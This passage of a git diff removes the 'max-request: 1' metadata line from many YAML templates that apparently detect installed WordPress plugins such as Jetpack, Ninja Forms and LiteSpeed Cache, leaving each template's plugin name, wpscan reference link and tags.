https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 